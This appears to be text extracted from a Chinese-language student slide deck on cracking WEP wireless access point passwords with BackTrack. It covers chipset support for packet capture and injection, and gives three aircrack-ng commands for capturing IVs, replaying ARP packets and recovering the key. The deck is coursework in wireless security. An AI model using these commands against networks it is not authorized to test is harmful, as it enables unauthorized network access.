利用 BackTrack

破解無線 AP 密碼

01

無線

網路

安全

性設

計實

務

組員： 姚芳德、蘇文淵、陳天晟、洪紹祥

02

Intr

od

ucti

on

現在無線 WIFI 主要使用WEP,WPA,WPA2 加密模式。WEP 無線加密模式有著最好的兼容性，無線 AP 無線網卡都支持此種加密，可是因此也留下了最容易破解的先天不足

03

Bac

kTar

ack

It's evolved from the merge of the two wide spread distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org.

無線網卡由于各種網卡采用的芯片不同，可能某些功能未能實現。推薦 Prisam 2 或 Atheros 芯片。 IBM 比電內置的無線網卡通常有兩種：Intel 或 IBM 。 IBM 用的就是 Atheros 芯片。不建議使用 Intel 芯片，因為其設計上的原因，抓封包有問題，而且不能順利發攻擊包。如果買 PCMCIA 網卡，推薦 Netgear WAG511 ，在這邊我們使用了 D-link DWL-G122 來作為實驗的網卡。

04

Wir

ele

ss C

ard

以下是常見芯片對 aircrack 的支援情況： 晶片 抓包 發攻擊包HermesI 支援 不支援Prism2/3 支援 支援PrismGT 支援 支援Atheros 支援 支援RTL8180 支援 支援Aironet 支援 不支援Ralink 支援 支援Centrino b 部分支援 不支援Centrino b/g 支援 不支援TI (ACX100 / ACX111) 未知 不支援Broadcom 不支援 不支援

05

Wir

ele

ss C

ard

06

Air

cra

ck O

verv

iew

07

Air

cra

ck S

tep

1airodump-ng --output-format ivs --ivs -w ivsfile -c 1 mon0

08

Air

cra

ck S

tep

2aireplay-ng -3 -b ap_mac  -x 1024 wlan0

09

Air

cra

ck S

tep

3aircrack-ng -n 64 -b ap_mac name-01.ivs

Opps

10

Ch

eck it

ou

t!

END